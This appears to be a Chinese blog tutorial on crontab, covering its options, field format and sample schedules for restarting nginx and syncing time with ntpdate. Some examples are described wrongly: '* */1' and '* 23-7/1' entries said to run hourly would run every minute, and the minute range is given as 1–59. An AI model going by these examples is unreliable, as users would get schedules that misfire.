补充说明：cron是一个常驻服务，它提供计时器的功能，让用户在特定的时间得以执行预设的指令或程序。只要用户会编辑计时器的配置文件，就可以使 用计时器的功能。其配置文件格式如下：

Minute Hour Day Month DayOFWeek Command

参　　数：

-e 　编辑该用户的计时器设置。

-l 　列出该用户的计时器设置。

-r 　删除该用户的计时器设置。

-u<用户名称> 　指定要设定计时器的用户名称。

2，crontab 格式

基本格式 :

* *　 *　 *　 *　　command

分　时　日　月　周　 命令

第1列表示分钟1～59 每分钟用*或者 */1表示

第2列表示小时1～23（0表示0点）

第3列表示日期1～31

第4列 表示月份1～12

第5列标识号星期0～6（0表示星期天）

第6列要运行的命令

# Use the hash sign to prefix a comment

# +—————- minute (0 – 59)

# | +————- hour (0 – 23)

# | | +———- day of month (1 – 31)

# | | | +——- month (1 – 12)

# | | | | +—- day of week (0 – 7) (Sunday=0 or 7)

# | | | | |

# * * * * * command to be executed

crontab文件的一些例子：

30 21 * * * /etc/init.d/nginx restart

每晚的21:30重启 nginx。

45 4 1,10,22 * * /etc/init.d/nginx restart

每月1、 10、22日的4 : 45重启nginx。

10 1 * * 6,0 /etc/init.d/nginx restart

每周六、周日的1 : 10重启nginx。

0,30 18-23 * * * /etc/init.d/nginx restart

每天18 : 00至23 : 00之间每隔30分钟重启nginx。

0 23 * * 6 /etc/init.d/nginx restart

每星期六的11 : 00 pm重启nginx。

* */1 * * * /etc/init.d/nginx restart

每一小时重启nginx

* 23-7/1 * * * /etc/init.d/nginx restart

晚上11点到早上7点之间，每 隔一小时重启nginx

0 11 4 * mon-wed /etc/init.d/nginx restart

每月的4号与每周一到周三 的11点重启nginx

0 4 1 jan * /etc/init.d/nginx restart

一月一号的4点重启nginx

*/30 * * * * /usr/sbin/ntpdate 210.72.145.20

每半小时同步一下时间

如果需要根据centos vps内存大小来判断然后重启，看以参考这篇文章：

Linux脚本：根据CPU负载及内存使用率自动重启服务进程